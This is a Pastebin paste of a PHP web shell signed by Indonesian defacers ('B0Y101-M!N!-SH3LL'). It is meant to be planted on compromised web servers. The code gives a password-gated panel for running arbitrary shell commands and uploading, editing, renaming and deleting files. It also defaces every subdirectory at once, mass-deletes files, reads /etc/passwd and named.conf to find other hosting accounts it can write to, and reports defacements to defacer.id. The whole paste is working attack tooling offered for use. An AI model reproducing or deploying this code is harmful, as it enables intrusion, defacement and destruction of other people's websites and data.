SHARE
TWEET

JANCOKONTOLASU

a guest Jul 11th, 2019 125 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @session_start();
  3. @set_time_limit(0);
  4.  
  5.  
  6. @$pass = $_POST['pass'];
  7. $chk_login = true;
  8. $username = "101";
  9. $password = "B0Y101";
  10.  
  11.  
  12. if($pass == $password)
  13. {
  14.  $_SESSION['nst'] = "$pass";
  15. }
  16.  
  17. if($chk_login == true)
  18. {
  19.  if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password)
  20.  {
  21.  die("
  22.  <title>B0Y101-M!N!-SH3LL</title>
  23. <br>
  24. <br>
  25. <center><font face= audiowide size=8><font color=yellow>[<font color=gold>#] HAC<font color=yellow>KED BY <font color=gold>B0Y<font color=yellow> 101 [<font color=gold>#]<br><br>
  26.   <center><body bgcolor=black><center><br>
  27.   <table border=0 cellpadding=0 cellspacing=0 width=100% height=100%><br><br>
  28.   <table width=100 bgcolor=black border=6 bordercolor=cyan><tr><td>
  29.   <font size=1 face=lobster><center>
  30.   <b></font></a></b>
  31.   </center>
  32.   <form method=post>
  33.   <font size=5 color=cyan><strong><br><center>[#]B0Y101-M!N!-SH3LL[#]
  34. </center></strong><br> <font color=cyan><marquee direction=right scrollamount=100><font color=red>_________</font><font color=yellow>_________</font><font color=green>________</font> <br></marquee><br><br>
  35.   <input type=password name=pass size=60>
  36.   </form><br><br>
  37.   <b><font color=white>YOUR IP</b> ".$_SERVER["REMOTE_ADDR"]."
  38.  <font color=cyan><marquee scrollamount=100><font color=red>_________</font><font color=yellow>________</font><font color=green>_________</font> <br>
  39.   </td></tr></table>
  40.   </td></tr></table><br><font color=white style='text-shadow: 0 0 20px red, 0 0 5px red, 0 0 7px red, 0 0 4px red; font-weight:bold: red;font-size:20px'><br><i>INDONEISAN HACKER RULEZ</font>
  41.   ");
  42.  }
  43. }
  44.  
  45.  
  46. set_time_limit(0);
  47. error_reporting(0);
  48.  
  49. if(get_magic_quotes_gpc()){
  50. foreach($_POST as $key=>$value){
  51. $_POST[$key] = stripslashes($value);
  52. }
  53. }
  54. echo '<!DOCTYPE HTML>
  55. <HTML>
  56. <HEAD>
  57.     <link href="https://fonts.googleapis.com/css?family=Audiowide|Space+Mono" rel="stylesheet">
  58. <link href="https://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
  59. <title>B0Y101-M!N!-SH3LL</title>
  60. <style>
  61. body{
  62. font-family: "Rye", jolly lodger;
  63. background-image: url("https://www.imageupload.co.uk/images/2018/06/04/markntod.png");
  64. color:White;    background-attachment:fixed;    background-repeat:no-repeat;    background-position:center;     background-color:transparan;    -webkit-background-size: 90% 100%; } #content tr:hover{
  65. text-shadow:0px 0px 1px #000000;
  66. }
  67. #content tr:hover{
  68. background-color: red;
  69. text-shadow:0px 0px 10px white;
  70. }
  71. #content .first{
  72. background-color: lime;
  73. }
  74. #content .first:hover{
  75. background-color: red;
  76. text-shadow:0px 0px 1px #FF4C00;
  77. }
  78. table{
  79. border: 6px #ffffff dotted;
  80. }
  81. H1{
  82. font-family: "Rancho", jolly lodger;
  83. }
  84. a{
  85. color: #ffffff;
  86. text-decoration: none;
  87. }
  88. a:hover{
  89. color: #fff;
  90. text-shadow:0px 0px 10px #ffffff;
  91. }
  92. input,select,textarea{
  93. border: 2px #FCFF00 solid;
  94. -moz-border-radius: 5px;
  95. -webkit-border-radius:5px;
  96. border-radius:5px;
  97. }
  98. </style>
  99. </HEAD>
  100. <BODY>
  101. <center><br><font size=20><font color=white><center>[#]<font color=red>B0Y101</font><font color=yellow>-M!N!-</font><font color=green>SH3LL</font><font color=white>[#]</font></center></H1></font></font><br>
  102. <body class="  pace-done" bgcolor="black"><div class="pace  pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
  103. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  104. <tr><td><font color=cyan><i>
  105. Current Path : ';
  106. if(isset($_GET['path'])){
  107. $path = $_GET['path'];
  108. }else{
  109. $path = getcwd();
  110. }
  111. $path = str_replace('\\','/',$path);
  112. $paths = explode('/',$path);
  113.  
  114. foreach($paths as $id=>$pat){
  115. if($pat == '' && $id == 0){
  116. $a = true;
  117. echo '<a href="?path=/">/</a>';
  118. continue;
  119. }
  120. if($pat == '') continue;
  121. echo '<a href="?path=';
  122. for($i=0;$i<=$id;$i++){
  123. echo "$paths[$i]";
  124. if($i != $id) echo "/";
  125. }
  126. echo '">'.$pat.'</a>/';
  127. }
  128. echo '</td></tr><tr><td>';
  129. if (isset($_GET['MR-B0Y101-MASSdeface'])) {
  130. echo "<center><form method='POST'><br>Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>File Name : <input type='text' name='file_name' value='101.php'><br><br><br>Script Deface Lu Asu : <br><textarea style='width: 300px; height: 100px;' name='index'>HACKED BY MR-B0Y101</textarea><br><input type='submit' value='Submit'></form></center><br><br>";
  131. }
  132. if (isset ($_POST['base_dir']))
  133. {
  134.         if (!file_exists ($_POST['base_dir']))
  135.                 die ($_POST['base_dir']." Not Found !<br>");
  136.  
  137.         if (!is_dir ($_POST['base_dir']))
  138.                 die ($_POST['base_dir']." Is Not A Directory !<br>");
  139.  
  140.         @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
  141.  
  142.         $files = @scandir ($_POST['base_dir']) or die ("JIANCOK...<br>");
  143.  
  144.         foreach ($files as $file):
  145.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  146.                 {
  147.                         $index = getcwd ()."/".$file."/".$_POST['file_name'];
  148.                         if (file_put_contents ($index, $_POST['index']))
  149.                                 echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: lime'>Done</span><br>";
  150.                 }
  151.         endforeach;
  152. }if (isset($_GET['bunuh'])) {
  153.     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  154.             die('<center><br><center><h2>Shell Telah Dihapus</h2><br>Terimakasih Atas Semuanya ^_^</center></center>');
  155.         else
  156.             echo '<center>unlink failed!</center>';
  157.             }
  158.             elseif($_GET['do'] == 'MR-B0Y101-DEF.ID') {
  159. echo "<center><form method='post'>
  160.         <u>Defacer</u>: <br>
  161.         <input type='text' name='notiper' size='50' value='MR-B0Y'><br>
  162.         <u>Team</u>: <br>
  163.         <input type='text' name='tim' size='50' value='DARK FORCE ARMY'><br>
  164.         <u>Domains</u>: <br>
  165.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  166.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  167.         </form>";
  168. $site = explode("\r\n", $_POST['sites']);
  169. $go = $_POST['go'];
  170. $notiper = $_POST['notiper'];
  171. $tim = $_POST['tim'];
  172. if($go) {
  173. foreach($site as $sites) {
  174. $zh = $sites;
  175. $form_url = "https://defacer.id/archive/notify";
  176. $data_to_post = array();
  177. $data_to_post['attacker'] = "$notiper";
  178. $data_to_post['team'] = "$tim";
  179. $data_to_post['poc'] = 'SQL Injection';
  180. $data_to_post['url'] = "$zh";
  181. $curl = curl_init();
  182. curl_setopt($curl,CURLOPT_URL, $form_url);
  183. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  184. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  185. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  186. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  187. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  188. $result = curl_exec($curl);
  189. echo $result;
  190. curl_close($curl);
  191. echo "<br>";
  192. }
  193. }
  194. }
  195.             elseif($_GET['do'] == 'MR-B0Y101-ABOUT') {
  196.     echo '<center>B0Y101-M!N!-SH3LL<hr>Recoded &copy;<font color=aqua>B4NGS4D T3RH0RM4T <hr><br> Bersikaplah Sebangsat-bangsatnya,Sampai Tidak Ada Orang Yang Lebih Bangsat Lagi,Sesungguhnya Orang Yang Bangsat Masih Ada Yang Lebih Bangsat Lagi ^_^<hr>';
  197. } elseif($_GET['do'] == 'MR-B0Y101-MASSdelete') {
  198.     function hapus_massal($dir,$namafile) {
  199.         if(is_writable($dir)) {
  200.             $dira = scandir($dir);
  201.             foreach($dira as $dirb) {
  202.                 $dirc = "$dir/$dirb";
  203.                 $lokasi = $dirc.'/'.$namafile;
  204.                 if($dirb === '.') {
  205.                     if(file_exists("$dir/$namafile")) {
  206.                         unlink("$dir/$namafile");
  207.                     }
  208.                 } elseif($dirb === '..') {
  209.                     if(file_exists("".dirname($dir)."/$namafile")) {
  210.                         unlink("".dirname($dir)."/$namafile");
  211.                     }
  212.                 } else {
  213.                     if(is_dir($dirc)) {
  214.                         if(is_writable($dirc)) {
  215.                             if(file_exists($lokasi)) {
  216.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  217.                                 unlink($lokasi);
  218.                                 $idx = hapus_massal($dirc,$namafile);
  219.                             }
  220.                         }
  221.                     }
  222.                 }
  223.             }
  224.         }
  225.     }
  226.     if($_POST['start']) {
  227.         echo "<div style='margin: 5px auto; padding: 5px'>";
  228.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  229.         echo "</div>";
  230.     } else {
  231.     echo "<center>";
  232.     echo "<form method='post'>
  233.     <font style='text-decoration: underline;'>Folder:</font><br>
  234.     <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  235.     <font style='text-decoration: underline;'>Filename:</font><br>
  236.     <input type='text' name='d_file' value='101.php' style='width: 450px;' height='10'><br>
  237.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  238.     </form></center>";
  239.     }
  240. }if(isset($_GET['MR-B0Y101-COMMAND'])) {
  241.     echo "<i><form method='post'>
  242.     <font color=aqua style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  243.     <input type='text' size='20' height='10' name='101'><input type='submit' name='do_101' value='>>'>
  244.     </form>";
  245.     if($_POST['do_101']) {
  246.         echo "<pre>".exe($_POST['101'])."</pre>";
  247.         }
  248.     }
  249. if (isset($_GET['MR-B0Y101-CHANGEpass'])) {
  250.         ?>
  251.         <?php
  252.         function fgc($file){
  253.             return file_get_contents($file);
  254.         }
  255.         function changepass($plain){
  256.             $newpass = md5($plain);
  257.             $newpass = "\$auth_pass = \"".$newpass."\";";
  258.             $con = fgc($_SERVER['SCRIPT_FILENAME']);
  259.             $con = preg_replace("/\\\$auth_pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
  260.             return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  261.         }
  262.         echo '<center><h1>[#]GANTI PASSWORD SHELL[#]</h1></center>';   
  263.         echo  '<center>';
  264.         echo '<form action="" method=post ><table>';
  265.         echo '<tr><td>Pasword Baru</td><td> :  <input type=password name=pass1 style="border-radius:5px;" /></td></tr>';
  266.         echo '<tr><td>Ulangi Password</td><td> :  <input type=password name=pass2 style="border-radius:5px;" /></td></tr>';
  267.         echo '<tr><td colspan=2><input type=submit value=submit name=L style="border-radius:5px;width:100%"/></td></tr></table>';
  268.         echo '</form>';
  269.     if(isset($_POST['L'])){
  270.         if($_POST['pass1'] == $_POST['pass2']){
  271.             if(changepass($_POST['pass1'])){
  272.                 echo '<script>alert("password change successfully")</script>';         
  273.             }else{
  274.                 echo '<script>alert("password change failed")</script>';           
  275.             }
  276.         }else{
  277.             echo '<script>alert("password not match")</script>';
  278.         }
  279.     }
  280. }if (isset($_GET['MR-B0Y101-JUMPING'])) {
  281.     $i = 0;
  282.     echo "<div class='margin: 5px auto;'>";
  283.     if(preg_match("/hsphere/", $dir)) {
  284.         $urls = explode("\r\n", $_POST['url']);
  285.         if(isset($_POST['jump'])) {
  286.             echo "<pre>";
  287.             foreach($urls as $url) {
  288.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  289.                 $etc = "/etc/passwd";
  290.                 $f = fopen($etc,"r");
  291.                 while($gets = fgets($f)) {
  292.                     $pecah = explode(":", $gets);
  293.                     $user = $pecah[0];
  294.                     $dir_user = "/hsphere/local/home/$user";
  295.                     if(is_dir($dir_user) === true) {
  296.                         $url_user = $dir_user."/".$url;
  297.                         if(is_readable($url_user)) {
  298.                             $i++;
  299.                             $jrw = "[<font color=#00FF00>R</font>] <a href='?dir=$url_user'><font color=#00FF00>$url_user</font></a>";
  300.                             if(is_writable($url_user)) {
  301.                                 $jrw = "[<font color=#00FF00>RW</font>] <a href='?dir=$url_user'><font color=#00FF00>$url_user</font></a>";
  302.                             }
  303.                             echo $jrw."<br>";
  304.                         }
  305.                     }
  306.                 }
  307.             }
  308.         if($i == 0) {
  309.         } else {
  310.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  311.         }
  312.         echo "</pre>";
  313.         } else {
  314.             echo '<center>
  315.                   <form method="post">
  316.                   List Domains: <br>
  317.                   <textarea name="url" style="width: 500px; height: 250px;">';
  318.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  319.             while($getss = fgets($fp)) {
  320.                 echo $getss;
  321.             }
  322.             echo  '</textarea><br>
  323.                   <input type="submit" value="Jumping" name="jump" class="btn btn-success btn-sm" style="width: 500px; height: 25px;">
  324.                   </form></center>';
  325.         }
  326.     } elseif(preg_match("/vhosts/", $dir)) {
  327.         $urls = explode("\r\n", $_POST['url']);
  328.         if(isset($_POST['jump'])) {
  329.             echo "<pre>";
  330.             foreach($urls as $url) {
  331.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  332.                 if(is_dir($web_vh) === true) {
  333.                     if(is_readable($web_vh)) {
  334.                         $i++;
  335.                         $jrw = "[<font color=#00FF00>R</font>] <a href='?dir=$web_vh'><font color=#00FF00>$web_vh</font></a>";
  336.                         if(is_writable($web_vh)) {
  337.                             $jrw = "[<font color=
  338. #00FF00>RW</font>] <a href='?dir=$web_vh'><font color=
  339. #00FF00>$web_vh</font></a>";
  340.                         }
  341.                         echo $jrw."<br>";
  342.                     }
  343.                 }
  344.             }
  345.         if($i == 0) {
  346.         } else {
  347.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  348.         }
  349.         echo "</pre>";
  350.         } else {
  351.             echo '<center>
  352.                   <form method="post">
  353.                   List Domains: <br>
  354.                   <textarea name="url" style="width: 500px; height: 250px;">';
  355.                   bing("ip:$ip");
  356.             echo  '</textarea><br>
  357.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  358.                   </form></center>';
  359.         }
  360.     } else {
  361.         echo "<pre>";
  362.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  363.         while($passwd = fgets($etc)) {
  364.             if($passwd == '' || !$etc) {
  365.                 echo "<font color=red>Can't read /etc/passwd</font>";
  366.             } else {
  367.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  368.                 foreach($user_jumping[1] as $user_idx_jump) {
  369.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  370.                     if(is_readable($user_jumping_dir)) {
  371.                         $i++;
  372.                         $jrw = "[<font color=
  373. #00FF00>R</font>] <a href='?dir=$user_jumping_dir'><font color=
  374. #00FF00>$user_jumping_dir</font></a>";
  375.                         if(is_writable($user_jumping_dir)) {
  376.                             $jrw = "[<font color=
  377. #00FF00>RW</font>] <a href='?dir=$user_jumping_dir'><font color=
  378. #00FF00>$user_jumping_dir</font></a>";
  379.                         }
  380.                         echo $jrw;
  381.                         if(function_exists('posix_getpwuid')) {
  382.                             $domain_jump = file_get_contents("/etc/named.conf");   
  383.                             if($domain_jump == '') {
  384.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  385.                             } else {
  386.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  387.                                 foreach($domains_jump[1] as $dj) {
  388.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  389.                                     $user_jumping_url = $user_jumping_url['name'];
  390.                                     if($user_jumping_url == $user_idx_jump) {
  391.                                         echo " => ( <u>$dj</u> )<br>";
  392.                                         break;
  393.                                     }
  394.                                 }
  395.                             }
  396.                         } else {
  397.                             echo "<br>";
  398.                         }
  399.                     }
  400.                 }
  401.             }
  402.         }
  403.         if($i == 0) {
  404.         } else {
  405.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  406.         }
  407.         echo "</pre>";
  408.     }
  409.     echo "</div>";
  410. }if(isset($_FILES['file'])){
  411. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  412. echo '<font color="green">SUCCESS</font><br />';
  413. }else{
  414. echo '<font color="red">ERROR</font><br />';
  415. }
  416.  
  417. }
  418. echo '<i><font color=lime>'.php_uname().'<br>  <b><font color=aqua>YOUR IP</b> '.$_SERVER['REMOTE_ADDR'].'</b><br>';
  419. echo '<i><font color=aqua>Recoded &copy; '.date('Y').' - <a><font color=yellow>B4NGS4D T3RH0RM4T</font><center></a>';
  420. echo '<form enctype="multipart/form-data" method="POST"><hr>
  421. <marquee behavior=alternate scrollamount=20>YANG BACA TULISAN INI , BURIQ!!</marquee><hr> <br><input type="file" name="file" />
  422. <input type="submit" value="UPLOAD" />
  423. </form><hr><ul><center><br>
  424. <a href=?MR-B0Y101-CHANGEpass><input type="submit" value="CHANGE PASS" /></form>
  425. <a href=?><input type="submit" value="HOME" /> </form>
  426. <a href=?MR-B0Y101-MASSdeface><input type="submit" value="MASS DEFACE" /></form>
  427. <a href=?dir=$dir&do=MR-B0Y101-MASSdelete><input type="submit" value="MASS DELETE" /></from><br><br>
  428. <a href=?dir=$dir&do=MR-B0Y101-SYMLINK><input type="submit" value="SYMLINK" /></form>
  429. <a href=?dir=$dir&do=MR-B0Y101-MYSQL><input type="submit" value="MYSQL" /></from><br><br>
  430. <a href=?MR-B0Y101-COMMAND><input type="submit" value="COMMAND" /></from>
  431. <a href=?MR-B0Y101-JUMPING><input type="submit" value="JUMPING" /></form>
  432. <a href=?dir=$dir&do=MR-B0Y101-ABOUT><input type="submit" value="ABOUT" /></from>
  433. <a href=?dir=$dir&do=MR-B0Y101-DEF.ID><input type="submit" value="DEFACER.ID" /></from>
  434. <a href=index.php><input type="submit" value="KILL" /></form></a></center>
  435. </td></tr>';
  436. if(isset($_GET['filesrc'])){
  437. echo "<tr><td>Current File : ";
  438. echo $_GET['filesrc'];
  439. echo '</tr></td></table><br />';
  440. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  441. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  442. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  443. if($_POST['opt'] == 'chmod'){
  444. if(isset($_POST['perm'])){
  445. if(chmod($_POST['path'],$_POST['perm'])){
  446. echo '<font color="cyan">SUCCESS</font><br />';
  447. }else{
  448. echo '<font color="red">ERROR</font><br />';
  449. }
  450. }
  451. echo '<form method="POST">
  452. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  453. <input type="hidden" name="path" value="'.$_POST['path'].'">
  454. <input type="hidden" name="opt" value="chmod">
  455. <input type="submit" value="Go" />
  456. </form>';
  457. }elseif($_POST['opt'] == 'rename'){
  458. if(isset($_POST['newname'])){
  459. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  460. echo '<font color="cyan">SUCCESS</font><br />';
  461. }else{
  462. echo '<font color="red">ERROR</font><br />';
  463. }
  464. $_POST['name'] = $_POST['newname'];
  465. }
  466. echo '<form method="POST">
  467. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  468. <input type="hidden" name="path" value="'.$_POST['path'].'">
  469. <input type="hidden" name="opt" value="rename">
  470. <input type="submit" value="Go" />
  471. </form>';
  472. }elseif($_POST['opt'] == 'edit'){
  473. if(isset($_POST['src'])){
  474. $fp = fopen($_POST['path'],'w');
  475. if(fwrite($fp,$_POST['src'])){
  476. echo '<font color="cyan">DONE</font><br />';
  477. }else{
  478. echo '<font color="red">GAGAL</font><br />';
  479. }
  480. fclose($fp);
  481. }
  482. echo '<form method="POST">
  483. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  484. <input type="hidden" name="path" value="'.$_POST['path'].'">
  485. <input type="hidden" name="opt" value="edit">
  486. <input type="submit" value="Go" />
  487. </form>';
  488. }
  489. echo '</center>';
  490. }else{
  491. echo '</table><br /><center>';
  492. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  493. if($_POST['type'] == 'dir'){
  494. if(rmdir($_POST['path'])){
  495. echo '<font color="cyan">DONE</font><br />';
  496. }else{
  497. echo '<font color="red">ERROR</font><br />';
  498. }
  499. }elseif($_POST['type'] == 'file'){
  500. if(unlink($_POST['path'])){
  501. echo '<font color="cyan">Delete File Done.</font><br />';
  502. }else{
  503. echo '<font color="red">Delete File Error.</font><br />';
  504. }
  505. }
  506. }
  507. echo '</center>';
  508. $scandir = scandir($path);
  509. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  510. <tr class="first">
  511. <td><font color=black><center>Name</center></td>
  512. <td><font color=black><center>Size</center></td>
  513. <td><font color=black><center>Permissions</center></td>
  514. <td><font color=black><center>Options</center></td></font>
  515. </tr>';
  516.  
  517. foreach($scandir as $dir){
  518. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  519. echo "<tr>
  520. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  521. <td><center>--</center></td>
  522. <td><center>";
  523. if(is_writable("$path/$dir")) echo '<font color="cyan">';
  524. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  525. echo perms("$path/$dir");
  526. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  527.  
  528. echo "</center></td>
  529. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  530. <select name=\"opt\">
  531. <option value=\"selct\">Select</option>
  532. <option value=\"delete\">Delete</option>
  533. <option value=\"chmod\">Chmod</option>
  534. <option value=\"rename\">Rename</option>
  535. </select>
  536. <input type=\"hidden\" name=\"type\" value=\"dir\">
  537. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  538. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  539. <input type=\"submit\" value=\">>\" />
  540. </form></center></td>
  541. </tr>";
  542. }
  543. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  544. foreach($scandir as $file){
  545. if(!is_file("$path/$file")) continue;
  546. $size = filesize("$path/$file")/1024;
  547. $size = round($size,3);
  548. if($size >= 1024){
  549. $size = round($size/1024,2).' MB';
  550. }else{
  551. $size = $size.' KB';
  552. }
  553.  
  554. echo "<tr>
  555. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  556. <td><center>".$size."</center></td>
  557. <td><center>";
  558. if(is_writable("$path/$file")) echo '<font color="cyan">';
  559. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  560. echo perms("$path/$file");
  561. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  562. echo "</center></td>
  563. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  564. <select name=\"opt\">
  565. <option value=\"select\">Select</option>
  566. <option value=\"delete\">Delete</option>
  567. <option value=\"chmod\">Chmod</option>
  568. <option value=\"rename\">Rename</option>
  569. <option value=\"edit\">Edit</option>
  570. </select>
  571. <input type=\"hidden\" name=\"type\" value=\"file\">
  572. <input type=\"hidden\" name=\"name\" value=\"$file\">
  573. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  574. <input type=\"submit\" value=\">>\" />
  575. </form></center></td>
  576. </tr>";
  577. }
  578. echo '</table>
  579. </div>';
  580.    
  581.  
  582. }
  583. echo '<center><br><font color=lime>RECODED BY B4NGS4D T3RH0RM4T
  584. <br><td><center><font size=6><marquee scrollamount="100"><font color=red>______<font color=yellow>______<font color=green>______</marquee><br><font color=red>INDONEISAN</font><font color=yellow>-HACKER-</font><font color=green>RULEZ</font><marquee direction="right" scrollamount="100"><font color=red>______<font color=yellow>______<font color=green>______</marquee></font>
  585. </BODY><font color=red>
  586. </HTML>';
  587. function perms($file){
  588. $perms = fileperms($file);
  589.  
  590. if (($perms & 0xC000) == 0xC000) {
  591. // Socket
  592. $info = 's';
  593. } elseif (($perms & 0xA000) == 0xA000) {
  594. // Symbolic Link
  595. $info = 'l';
  596. } elseif (($perms & 0x8000) == 0x8000) {
  597. // Regular
  598. $info = '-';
  599. } elseif (($perms & 0x6000) == 0x6000) {
  600. // Block special
  601. $info = 'b';
  602. } elseif (($perms & 0x4000) == 0x4000) {
  603. // Directory
  604. $info = 'd';
  605. } elseif (($perms & 0x2000) == 0x2000) {
  606. // Character special
  607. $info = 'c';
  608. } elseif (($perms & 0x1000) == 0x1000) {
  609. // FIFO pipe
  610. $info = 'p';
  611. } else {
  612. // Unknown
  613. $info = 'u';
  614. }
  615.  
  616. // Owner
  617. $info .= (($perms & 0x0100) ? 'r' : '-');
  618. $info .= (($perms & 0x0080) ? 'w' : '-');
  619. $info .= (($perms & 0x0040) ?
  620. (($perms & 0x0800) ? 's' : 'x' ) :
  621. (($perms & 0x0800) ? 'S' : '-'));
  622.  
  623. // Group
  624. $info .= (($perms
  625. & 0x0020) ? 'r' : '-');
  626. $info .= (($perms & 0x0010) ? 'w' : '-');
  627. $info .= (($perms & 0x0008) ?
  628. (($perms & 0x0400) ? 's' : 'x' ) :
  629. (($perms & 0x0400) ? 'S' : '-'));
  630.  
  631. // World
  632. $info .= (($perms & 0x0004) ? 'r' : '-');
  633. $info .= (($perms & 0x0002) ? 'w' : '-');
  634. $info .= (($perms & 0x0001) ?
  635. (($perms & 0x0200) ? 't' : 'x' ) :
  636. (($perms & 0x0200) ? 'T' : '-'));
  637.  
  638. return $info;
  639. }
  640. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top